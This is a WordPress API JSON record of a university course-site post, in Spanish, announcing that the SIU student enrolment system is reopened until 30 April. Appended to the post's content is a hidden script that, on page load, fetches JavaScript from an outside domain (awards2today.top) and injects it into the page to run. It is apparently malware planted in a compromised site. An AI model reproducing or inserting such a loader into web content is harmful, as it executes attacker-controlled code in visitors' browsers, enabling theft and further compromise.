{"id":435,"date":"2020-04-09T13:13:11","date_gmt":"2020-04-09T16:13:11","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=435"},"modified":"2025-06-21T12:01:47","modified_gmt":"2025-06-21T15:01:47","slug":"reapertura-del-siu-para-inscripciones","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/04\/09\/reapertura-del-siu-para-inscripciones\/","title":{"rendered":"Reapertura del SIU para Inscripciones"},"content":{"rendered":"\n<p>Buenos d\u00edas estimados\/as estudiantes,<br>Hoy el Departamento de dise\u00f1o nos ha comunicado lo siguiente:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><p>Desde hoy, jueves 9 y hasta el 30 de abril inclusive, se ha reabierto el Sistema SIU para inscripciones de estudiantes en el a\u00f1o acad\u00e9mico, como tambi\u00e9n en las materias del primer semestre y anuales, para aquellos que aun no lo hicieron, menos los de primer a\u00f1o x que aun no tengan matr\u00edcula.Se solicita, por favor que avisen a lo alumnos que est\u00e9n cursando las distintas asignaturas, para que regularicen la situaci\u00f3n.<\/p><cite>Departamento de Dise\u00f1o-FAUD<\/cite><\/blockquote>\n\n\n\n<p>Aprovechen a inscribirse a todas las materias, inclusive a esta, sino lo han podido hacer. Y sobre todo corran la voz a aquellos que quiz\u00e1s no puedan acceder a internet de manera frecuente.<br>Saludos<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Buenos d\u00edas estimados\/as estudiantes,Hoy el Departamento de dise\u00f1o nos ha comunicado lo siguiente: Desde hoy, jueves 9 y hasta el 30 de abril inclusive, se ha reabierto el Sistema SIU para inscripciones de estudiantes en el a\u00f1o acad\u00e9mico, como tambi\u00e9n en las materias del primer semestre y anuales, para aquellos que aun no lo hicieron,<\/p><\/div>\n<div class=\"blog-btn\"><a href=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2020\/04\/09\/reapertura-del-siu-para-inscripciones\/\" class=\"home-blog-btn\">Leer m\u00e1s<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[15,6,16,9,7,8],"tags":[],"class_list":["post-435","post","type-post","status-publish","format-standard","hentry","category-consultas","category-cursado","category-diseno-grafico","category-diseno-industrial","category-faud","category-vida-universitaria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/435","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=435"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/435\/revisions"}],"predecessor-version":[{"id":853,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/435\/revisions\/853"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=435"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=435"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=435"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}